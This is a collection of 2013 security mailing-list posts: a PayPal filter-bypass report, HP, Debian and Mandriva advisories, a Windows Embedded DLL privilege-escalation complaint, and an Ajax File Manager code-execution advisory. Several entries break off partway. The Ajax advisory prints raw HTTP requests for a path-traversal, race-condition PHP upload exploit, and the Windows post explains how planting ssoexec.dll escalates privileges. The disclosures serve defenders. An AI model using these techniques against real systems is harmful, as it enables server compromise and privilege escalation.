Paypal Inc Bug Bounty #99 - Filter Bypass & Persistent Web Vulnerability

[Vulnerability Lab]

Title:
==
Paypal Inc Bug Bounty #99 - Filter Bypass & Persistent Web Vulnerability


Date:
=
2013-09-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=984

PayPal Security UID: nj1071UU


VL-ID:
=
984


Common Vulnerability Scoring System:

3.9


Introduction:
=
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer s choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient s account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its 
corporate headquarters are in San Jose, California, United 
States at eBay s North First Street satellite office campus. The company also 
has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow 
(near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), 
China s bankcard association, to allow Chinese consumers 
to use PayPal to shop online.PayPal is planning to expand its workforce in Asia 
to 2,000 by the end of the year 2010.
Between December 4ñ9, 2010, PayPal services were attacked in a series of 
denial-of-service attacks organized by Anonymous in retaliation 
for PayPal s decision to freeze the account of WikiLeaks citing terms of use 
violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract:
=
The Vulnerability Laboratory Research Team discovered a filter bypass & 
persistent web vulnerability in the official PayPal Inc Core Application API.


Report-Timeline:

2013-06-24: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-06-25: Vendor Notification (PayPal Inc Site Security Team)
2013-09-10: Vendor Response/Feedback (PayPal Inc Site Security Team)
2013-09-19: Vendor Fix/Patch (Developer Team - Bug Bounty Program Reward)
2013-09-20: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
PayPal Inc
Product: Core - Common [API] 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

An input filter bypass & persistent script code inject vulnerability is 
detected in the official PayPal Inc Core Application API.
A filter bypass vulnerability allows to evade the basic filter validation of a 
vulnerable application api module.
A persistent script code inject web vulnerability allows remote attackers to 
inject script code on the application-side of the affected module.

There is a feature in Paypal that allows its users to Set up custom message for 
their online customers. Paypal Users can customize 
this message so their online customers can automatically get relevant 
information if they to file a dispute in the Resolution Center. 
People who will get this message are usually the ones that either bought an 
item from a user online but said it didn

[security bulletin] HPSBGN02925 rev.1 - HP IceWall SSO, IceWall File Manager and IceWall Federation Agent, Multiple Remote Unauthorized Access Vulnerabilities

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03918632

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03918632
Version: 1

HPSBGN02925 rev.1 - HP IceWall SSO, IceWall File Manager and IceWall
Federation Agent, Multiple Remote Unauthorized Access Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-09-19
Last Updated: 2013-09-19

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP IceWall SSO,
IceWall File Manager and IceWall Federation Agent. The vulnerabilities could
be exploited remotely resulting in unauthorized access.

References: CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820,
SSRT101310

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP IceWall SSO Version 8.0
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 Enterprise Edition R1
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0.1 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R2 Enterprise Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R2 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R3 Enterprise Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R3 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Enterprise Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Enterprise Edition for Windows
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Standard Edition for Windows
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 Agent Option
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall SSO Version 8.0 Agent Option 2007
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall SSO Version 10.0 Agent Option
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall SSO Version 10.0 Agent Option Update Release 1
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall File Manager Version 3.0
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP1
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP2
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP3
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP4
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO 8.0 SAML2 Agent Option
 CVE-2013-4820

HP IceWall Federation Agent 3.0
 CVE-2013-4820

HP IceWall SSO 8.0 JAVA Agent Library
 CVE-2013-4820

HP IceWall SSO 8.0 JAVA Agent Library 2007
 CVE-2013-4820

HP IceWall SSO 10.0 JAVA Agent Library
 CVE-2013-4820

HP IceWall SSO 10.0 Smart Device Option
 CVE-2013-4818, CVE-2013-4820

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2013-4817(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
CVE-2013-4818(AV:N/AC:M/Au:N/C:P/I:N/A:N)   4.3
CVE-2013-4819(AV:N/AC:M/Au:S/C:P/I:N/A:N)   3.5
CVE-2013-4820(AV:N/AC:H/Au:S/C:P/I:N/A:N)   2.1
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following software updates available to resolve the
vulnerabilities:

IceWall SSO 10.0 DFW for Windows Patch Release 1

IceWall SSO 8.0 R2 CERTD Patch Release 7

IceWall SSO 8.0 R3 CERTD Patch Release 4

IceWall SSO 10.0 CERTD Patch Release 5

IceWall SSO 10.0 CERTD for Windows Patch Release 1

IceWall SSO 10.0 Agent Option Patch Release 2 Servlet edition

IceWall SSO 8.0 Agent Option 2007 Update Release 2 Patch Release 5

IceWall SSO 10.0 Agent Option Patch Release 1 IIS edition

HP has provided a mitigation workaround for the vulnerabilities for the
following products:

HP IceWall SSO Version 8.0

HP IceWall SSO Version 8.0 Enterprise Edition R1

HP IceWall SSO Version 8.0.1 Standard Edition

HP IceWall SSO Version 8.0 R2 Enterprise Edition

HP IceWall SSO Version 8.0 R2 Standard Edition

HP IceWall SSO Version 8.0 R3 Enterprise Edition

HP IceWall SSO Version 8.0 R3 Standard Edition

HP IceWall SSO Version 10.0 Enterprise Edition

HP IceWall SSO Version 10.0 Standard Edition

HP IceWall SSO Version 8.0 Agent Option

HP IceWall SSO Version 8.0 Agent Option 2007

HP IceWall SSO Version 10.0 Agent Option

HP IceWall SSO Version 10.0 Agent Option Update Release 1

HP IceWall File Manager Version 3.0

HP IceWall File Manager Version 3.0 SP1

HP IceWall File Manager Version 3.0 SP2

HP IceWall File Manager Version 3.0 SP3

HP IceWall File Manager Version 3.0

[SECURITY] [DSA 2761-1] puppet security update

[Raphael Geissert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2761-1   secur...@debian.org
http://www.debian.org/security/  Raphael Geissert
September 19, 2013 http://www.debian.org/security/faq
- -

Package: puppet
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE ID : CVE-2013-4761 CVE-2013-4956

Several vulnerabilities were discovered in puppet, a centralized
configuration management system. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2013-4761

The 'resource_type' service (disabled by default) could be used to
make puppet load arbitrary Ruby code from puppet master's file
system.

CVE-2013-4956

Modules installed with the Puppet Module Tool might be installed
with weak permissions, possibly allowing local users to read or
modify them.

The stable distribution (wheezy) has been updated to version 2.7.33 of
puppet. This version includes the patches for all the previous DSAs
related to puppet in wheezy. In this version, the puppet report format
is now correctly reported as version 3.

It is to be expected that future DSAs for puppet update to a newer,
bug fix-only, release of the 2.7 branch.

The oldstable distribution (squeeze) has not been updated for this
advisory: as of this time there is no fix for CVE-2013-4761 and the
package is not affected by CVE-2013-4956.

For the stable distribution (wheezy), these problems have been fixed in
version 2.7.23-1~deb7u1.

For the testing distribution (jessie) and the unstable distribution (sid),
these problems have been fixed in version 3.2.4-1.

We recommend that you upgrade your puppet packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlI7cvQACgkQYy49rUbZzlq22wCcCQGR2FfvrHBuIaWlPiZya2v3
XREAn3V+J1Fu+C2WSu6sZW1LPiitkUsT
=kr8l
-END PGP SIGNATURE-

[security bulletin] HPSBGN02923 rev.1 - HP ArcSight Enterprise Security Manager Management Web Interface, Remote Cross Site Scripting (XSS)

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03901176

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03901176
Version: 1

HPSBGN02923 rev.1 - HP ArcSight Enterprise Security Manager Management Web
Interface, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-09-19
Last Updated: 2013-09-19

Potential Security Impact: Remote Cross Site Scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP ArcSight
Enterprise Security Manager Management Web Interface. The vulnerability could
be exploited remotely resulting in Cross Site Scripting (XSS).

References: CVE-2013-4815 (SSRT101101)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ArcSight Enterprise Security Manager (ESM) prior to v5.5.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2013-4815(AV:N/AC:M/Au:N/C:N/I:P/A:N)   4.3
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Puneeth Gowda for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has made the following software update available to resolve the
vulnerability.

HP ArcSight Enterprise Security Manager (ESM) v5.5 or subsequent.

HISTORY
Version:1 (rev.1) - 19 September 2013 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlI7YXAACgkQ4B86/C0qfVlWXQCgxN0BLWI+u0IWc9FXPaJC+jNB
AY0AoIMG6+LOSbS6BItQ89TnH6TkAqJJ
=lURI
-END PGP SIGNATURE-

[ MDVSA-2013:239 ] wordpress

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:239
 http://www.mandriva.com/en/support/security/
 ___

 Package : wordpress
 Date: September 19, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated wordpress and php-phpmailer packages fix security
 vulnerabilities:
 
 wp-includes/functions.php in WordPress before 3.6.1 does not properly
 determine whether data has been serialized, which allows remote
 attackers to execute arbitrary code by triggering erroneous PHP
 unserialize operations (CVE-2013-4338).
 
 WordPress before 3.6.1 does not properly validate URLs before use in
 an HTTP redirect, which allows remote attackers to bypass intended
 redirection restrictions via a crafted string (CVE-2013-4339).
 
 wp-admin/includes/post.php in WordPress before 3.6.1 allows remote
 authenticated users to spoof the authorship of a post by leveraging the
 Author role and providing a modified user_ID parameter (CVE-2013-4340).
 
 The get_allowed_mime_types function in wp-includes/functions.php in
 WordPress before 3.6.1 does not require the unfiltered_html capability
 for uploads of .htm and .html files, which might make it easier for
 remote authenticated users to conduct cross-site scripting (XSS)
 attacks via a crafted file (CVE-2013-5738).
 
 The default configuration of WordPress before 3.6.1 does not prevent
 uploads of .swf and .exe files, which might make it easier for remote
 authenticated users to conduct cross-site scripting (XSS) attacks
 via a crafted file, related to the get_allowed_mime_types function
 in wp-includes/functions.php (CVE-2013-5739).
 
 Additionally, php-phpmailer has been updated to a newer version
 required by the updated wordpress.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4338
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4340
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5738
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5739
 http://advisories.mageia.org/MGASA-2013-0285.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 20b778e4dce88394ba3fe60f3db38ec6  
mbs1/x86_64/php-phpmailer-5.2.7-0.20130917.1.mbs1.noarch.rpm
 9174445e9a2e76973bcbea3909ba8af7  
mbs1/x86_64/wordpress-3.6.1-1.mbs1.noarch.rpm 
 afb38d03fc53350c03eba38eaea6561b  
mbs1/SRPMS/php-phpmailer-5.2.7-0.20130917.1.mbs1.src.rpm
 ca3d0d9e13aacf26feab9382d20a0560  mbs1/SRPMS/wordpress-3.6.1-1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFSOuIJmqjQ0CJFipgRAtpJAKDrZ1olC4YbT6b4n87N7Ya/IQmXSQCfWLZ1
6a7UtwzhkUzNWtS0JI13RdU=
=hn89
-END PGP SIGNATURE-

Re: %windir%\temp\sso\ssoexec.dll (or: howtrustworthy is Microsoft's build process)

[Stefan Kanthak]

This is a followup to 
and :

On Sunday, March 04, 2012 9:06 PM I wrote:

> Hi @ll,
> 
> the system image "\Setup\WIM\setup.wim" on the "POSReady 2009 eval CD",
> available from the Microsoft Download Center under
> ,
> contains the following registry entries:
> 
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
> NT\CurrentVersion\Winlogon\Notify\SSOExec]
> "Asynchronous"=dword:0001
> "Impersonate"=dword:0001
> "Logoff"="SSOReset"
> "Unlock"="SSOExec"
> "Lock"="SSOReset"
> "DLLName"="%windir%\\temp\\sso\\ssoexec.dll"

[...]

> To complete the picture: the ACLs on the directory "%windir%\temp" in
> systems installed from this image/CD allow unprivileged users to create
> a subdirectory "sso" in "%windir%\temp" and then the "ssoexec.dll",
> allowing them to have their code run under every (other) user account
> used to log on afterwards, resulting in a privilege escalation.

After I learned that the same vulnerability exists in EVERY installation
of Windows Embedded POSReady 2009 I contacted a vendor and Microsoft
again.

The vendor got the following reply from Microsoft:

| The Microsoft Windows Embedded Product team, along with the MSRC 
| (Microsoft Security Response Center) team researched this in early
| 2012 and determined that this is a not a vulnerability because 
   ~
| Microsoft Malware Protection Center does not consider this to be 
  
| malware.
  

OUCH! How absurd!

| It was determined that these keys came from XP Embedded and 
| the Standard Windows Logon Component. They found no evidence of 
| malware on our build systems and the presence of the keys is not
| an indication that malware was ever present on the systems

There is no file "ssoexec.dll" in Windows Embedded POSReady 2009!
As far as I know there is no file by this name in ANY version/variant
of Windows!

I requested clarification about these absurd statements and whether
a hotfix will be provided from the MSRC  and
got the following answer:

| Could you explain how the EOP attack works using this DLL?
| Normal users don't have write permission to %windir%, and if an
| attacker controls an Administrator account then they've already
| defeated security.

to which I replied:

| The directory in question is but "%windir%\temp\"!
| In Windows Embedded POSReady 2009 UNPRIVILEGED users can create
| the subdirectory "sso\" and the DLL "ssoexec.dll".
| Game over!

which yield another absurd answer from the MSRC:

| After some research, it appears this EOP attack requires that the
| attacker has already violated one of the 10 Immutable Laws of Security
| (http://technet.microsoft.com/library/cc722487.aspx ), most notably
| laws #1 or #3. You should read the article to understand why those
| laws matter.

OUCH! I asked the MSRC again:

| which part of "In Windows Embedded POSReady 2009 UNPRIVILEGED users
| can create the subdirectory "sso\" and the DLL "ssoexec.dll" is not
| understood?

and got the final answer:

| We are aware of the issues and arguments you've mentioned. An attacker
| in a position to carry out these attacks could also carry out many
| other attacks we can't stop. The link provided below explains this in
| detail.

OUCH!

Stefan Kanthak

[ MDVSA-2013:238 ] wireshark

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2013:238
 http://www.mandriva.com/en/support/security/
 ___

 Package : wireshark
 Date: September 19, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities was found and corrected in Wireshark:
 
 The dissect_nbap_T_dCH_ID function in epan/dissectors/packet-nbap.c
 in the NBAP dissector in Wireshark 1.8.x before 1.8.10 and 1.10.x
 before 1.10.2 does not restrict the dch_id value, which allows
 remote attackers to cause a denial of service (application crash)
 via a crafted packet (CVE-2013-5718).
 
 epan/dissectors/packet-assa_r3.c in the ASSA R3 dissector in Wireshark
 1.8.x before 1.8.10 and 1.10.x before 1.10.2 allows remote attackers
 to cause a denial of service (infinite loop) via a crafted packet
 (CVE-2013-5719).
 
 Buffer overflow in the RTPS dissector in Wireshark 1.8.x before 1.8.10
 and 1.10.x before 1.10.2 allows remote attackers to cause a denial
 of service (application crash) via a crafted packet (CVE-2013-5720).
 
 The dissect_mq_rr function in epan/dissectors/packet-mq.c in the MQ
 dissector in Wireshark 1.8.x before 1.8.10 and 1.10.x before 1.10.2
 does not properly determine when to enter a certain loop, which allows
 remote attackers to cause a denial of service (application crash)
 via a crafted packet (CVE-2013-5721).
 
 Unspecified vulnerability in the LDAP dissector in Wireshark 1.8.x
 before 1.8.10 and 1.10.x before 1.10.2 allows remote attackers to
 cause a denial of service (application crash) via a crafted packet
 (CVE-2013-5722).
 
 This advisory provides the latest supported version of Wireshark
 (1.8.10) which is not vulnerable to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5718
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5719
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5720
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5721
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5722
 https://www.wireshark.org/security/wnpa-sec-2013-55.html
 https://www.wireshark.org/security/wnpa-sec-2013-56.html
 https://www.wireshark.org/security/wnpa-sec-2013-57.html
 https://www.wireshark.org/security/wnpa-sec-2013-58.html
 https://www.wireshark.org/security/wnpa-sec-2013-59.html
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 de61ebb8817cb8039504ca524781c497  
mes5/i586/dumpcap-1.8.10-0.1mdvmes5.2.i586.rpm
 d829f01a5a5f860a6169131be9323981  
mes5/i586/libwireshark2-1.8.10-0.1mdvmes5.2.i586.rpm
 b68baa4354238f3193dce302690f3787  
mes5/i586/libwireshark-devel-1.8.10-0.1mdvmes5.2.i586.rpm
 c6ec2e0ece2af0f1fb61d9733e621f45  
mes5/i586/rawshark-1.8.10-0.1mdvmes5.2.i586.rpm
 1bee6bed84baba1cac9902f654213c76  mes5/i586/tshark-1.8.10-0.1mdvmes5.2.i586.rpm
 c35b5c79b6a025dfe6d283a1a26409bf  
mes5/i586/wireshark-1.8.10-0.1mdvmes5.2.i586.rpm
 a671049d8adb62f53db78830c5fd0e27  
mes5/i586/wireshark-tools-1.8.10-0.1mdvmes5.2.i586.rpm 
 443c2e9cdc43786df065aba00f629d47  
mes5/SRPMS/wireshark-1.8.10-0.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 d1b79b99e14e7d71cfab1f043fbf6724  
mes5/x86_64/dumpcap-1.8.10-0.1mdvmes5.2.x86_64.rpm
 2094e86f1dd8f0908b5931814b03d280  
mes5/x86_64/lib64wireshark2-1.8.10-0.1mdvmes5.2.x86_64.rpm
 41a032e6ea9401c3ba49c5b2a2a670bc  
mes5/x86_64/lib64wireshark-devel-1.8.10-0.1mdvmes5.2.x86_64.rpm
 3dc07fa084199ba1cc6ebe6287e03583  
mes5/x86_64/rawshark-1.8.10-0.1mdvmes5.2.x86_64.rpm
 05b4625a36bf25b343574f30d9538029  
mes5/x86_64/tshark-1.8.10-0.1mdvmes5.2.x86_64.rpm
 02c751957b73bbe139523f4141d677fb  
mes5/x86_64/wireshark-1.8.10-0.1mdvmes5.2.x86_64.rpm
 d8f93640400df0bb2f4823165cd8b738  
mes5/x86_64/wireshark-tools-1.8.10-0.1mdvmes5.2.x86_64.rpm 
 443c2e9cdc43786df065aba00f629d47  
mes5/SRPMS/wireshark-1.8.10-0.1mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 7e3729b680262732e67fe8235615fcdb  mbs1/x86_64/dumpcap-1.8.10-1.mbs1.x86_64.rpm
 cf73b7aef79429ed8e703e3aa8b62fa1  
mbs1/x86_64/lib64wireshark2-1.8.10-1.mbs1.x86_64.rpm
 1e65c4a4df9e4808ff6d5142851603b4  
mbs1/x86_64/lib64wireshark-devel-1.8.10-1.mbs1.x86_64.rpm
 772a7e69de64fe6523f0a9360132a251  mbs1/x86_64/rawshark-1.8.10-1.mbs1.x86_64.rpm
 18f520b096e6a90e36c07253e3f06cd1  mbs1/x86_64/tshark-1.8.10-1.mbs1.x86_64.rpm
 8153e002e9ad7cf5a9ba5e878e8a1dc1  
mbs1/x86_64/wireshark-1.8.10-1.mbs1.x86_64.rpm
 3b10fffd6e77b81865b05c77460a21e5  
mbs1/x86_64/wireshark-tools-1.8.10-1.mbs1.x86_64.rpm 
 f573422739b5d540b16831abeea42823  mbs1/SRPMS/wireshark-1.8.10-1.mbs1.src.rpm
 

[PT-2013-41] Arbitrary Code Execution in Ajax File and Image Manager

[noreply]

---
(PT-2013-41) Positive Technologies Security Advisory 

Arbitrary Code Execution in Ajax File and Image Manager
---

---[ Vulnerable software ]

Ajax File and Image Manager
Version: 1.1 and earlier

Link:
http://www.phpletter.com/DOWNLOAD/

---[ Severity level ]

Severity level: High
Impact: Arbitrary Code Execution
Access Vector:  Remote


CVSS v2: 
Base Score: 10
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVE: not assigned

---[ Software description ]

Ajax file and Image Manager is an open source file manager, which employs Ajax 
and PHP. It can be used as a standalone web application, as well as the 
TinyMCE/FCKeditor plugin.

---[ Vulnerability description ]

The specialists of the Positive Research center have detected "Arbitrary Code 
Execution" vulnerability in Ajax File and Image Manager.

Due to incorrect application architecture, validation of file extension is 
implemented after uploading file. Uploaded file will subsequently be removed if 
its extension is not allowed by whitelist. Thus, you can refer to the uploaded 
file before its removal, resulting in arbitrary code execution.

Vulnerability exploitation example:

Send the following requests simultaneously:

1)

POST  
/targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/
  HTTP/1.1

  Host: localhost

  User-Agent: google/agent

  Connection: keep-alive

  Content-Type: multipart/form-data;  
boundary=---307211690811

  Content-Length: 613
-307211690811

  Content-Disposition: form-data;  name="file"; filename="1.php"

  Content-Type: image/jpeg




  -307211690811—



2)


POST  
/targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/
  HTTP/1.1

  Host: localhost

  User-Agent: google/agent

  Connection: keep-alive

  Content-Type: multipart/form-data;  
boundary=---307211690811

  Content-Length: 240
-307211690811

  Content-Disposition: form-data;  name="file"; filename=".htaccess"

  Content-Type: image/jpeg




  Allow from all

  

  -307211690811—



3)


GET /targethost/images/banner/1.php  HTTP/1.1

  Host: localhost

  Connection: keep-alive

This will also create the following files in the /targethost/images/banner 
directory:
.htaccess with




  Allow from all

  


and 2.php with .

---[ How to fix ]

No solution

---[ Advisory status ]

20.06.2013 - Vendor gets vulnerability details
04.09.2013 - Vulnerability details were sent to CERT
17.09.2013 - Public disclosure

---[ Credits ]

The vulnerability was detected by Ilya Krupenko, Positive Research Center 
(Positive Technologies Company)

An Analysis of the (In)Security State of the GameHouse Game Installation Mechanism

[RBS Research]

January 2013, we encountered the latest version of RealArcade
installer provided by GameHouse (a division of RealNetworks) on a
system during an audit. Considering its historical vulnerabilities and
recent reports about vulnerabilities in game clients/installers, we
decided to take a closer look at its current security state.

It was uncovered that not only was it still affected by almost two
year old, publicly known vulnerabilities allowing command execution,
but also new issues incl. unsafe permissions and a use-after-free. The
full paper describes the flaws in the GameHouse game installer
implementation for Windows, and how it exposes users’ systems.

While not responsive (except a classic response from support - see
timeline in report), GameHouse did silently address some of these
issues in a site update around May 2013, but other concerns still
remain.

Blog:
http://www.riskbasedsecurity.com/2013/09/an-analysis-of-the-insecurity-state-of-the-gamehouse-game-installation-mechanism/

Paper:
http://www.riskbasedsecurity.com/reports/RBS-GameHouseAnalysis-Sept2013.pdf

--

Carsten Eiram
Risk Based Security

Twitter: @RiskBased / @CarstenEiram